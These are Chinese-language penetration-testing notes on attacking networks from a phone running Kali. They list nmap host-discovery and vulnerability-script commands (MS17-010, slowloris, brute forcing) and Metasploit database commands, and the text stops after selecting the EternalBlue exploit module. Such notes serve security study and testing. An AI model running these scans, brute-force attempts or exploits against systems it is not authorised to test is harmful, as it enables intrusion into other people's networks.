手机进行攻击
这里测试过对无线wifi的攻击
msf结合nmap攻击
因为主要进内网的目的就是针对弱口令和永恒之蓝级别漏洞较多或者进行欺骗或者劫持
经过多次测试对于这种手机安装的调用的kali里面arp之类的劫持攻击 均无法实现
原因:手机wifi网卡不支持
当然也有可能是我手机的问题,师傅们可以试下
所以这里主要讲nmap和msf的攻击 其实就是转换成了常规的攻击了
只是说这种需要更快和有针对性地分析相关的漏洞罢了
端口扫描
#我在测试的时候选择的是fping和nmap去实现
fping -asg 192.168.1.1/24
namp
①基础的主机渗透
nmap -sn 10.0.0.0/24 -oG online.txt 或者nmap -sn 10.96.10.100-200
cat online.txt | grep -i up
②在针对指定的ip进行探测端口开放情况
nmap -sV -A -O 10.0.0.9
③探测版本
nmap -sV 10.0.0.9
④探测操作系统可能存在的漏洞 主要是script
常见的漏洞
nmap -script SMB-vuln-ms17-010 192.168.10.34 #可以探测该主机是否存在ms17_010漏洞
nmap --max-parallelism 800 --script http-slowloris scanme.nmap.org #可以探测该主机是否存在http拒绝服务攻击漏洞
nmap -script http-iis-short-name-brute 192.168.10.34 #探测是否存在IIS短文件名漏洞
nmap -script mysql-empty-password 192.168.10.34 #验证mysql匿名访问
nmap -p 443 -script ssl-ccs-injection 192.168.10.34 #验证是否存在openssl Ccs注入漏洞
--script=http-waf-detect #验证主机是否存在WAF
--script=http-waf-fingerprint #验证主机是否存在WAF
nmap --script-brute 192.168.1.1 #nmap可对数据库、SMB、SNMP等进行简单密码的暴力破解
nmap --script-vuln 192.168.1.1 #扫描是否有常见漏洞
这里建议直接探测msf和暴力破解
msf
对于个人而言 比较喜欢把msf当作拿shell前的渗透 主要是exp多
权限维持和内网的信息收集之类的还是比较喜欢用cs,个人理解吧
① #建立数据库相关的命令
#主要是方便下次接着渗透 但是手机上的kali好像一堆问题 最后这个我没有解决掉
#师傅们可以参考这个https://www.jianshu.com/p/bd4f586028ca
db_connect kali:kali@192.168.0.2:1500/metasploits
db_connect <user:pass>@<host:port>/<database> #连接的语法
db_status #查看db_连接的状态
db_disconnect #断开数据库连接
db_import #向数据库中导入其他扫描工具
db_rebuild_cache #重新建立缓存
db_nmap #msf中调用nmap
②常用的使用思路这些其实不是很想写,主要还是得考虑是否研究集成exp进入这个,不过个人批量化扫exp的不是选择的这个,个人用不习惯
#个人认为其实也就是几个,其他的看英文即可
search 查找
use
show
set
run或者exploit
③常用的攻击exp以及ssh_login爆破之类的
msf使用永恒之蓝的模块
search ms17-010
use exploit/windows/smb/ms17_010_eternalblue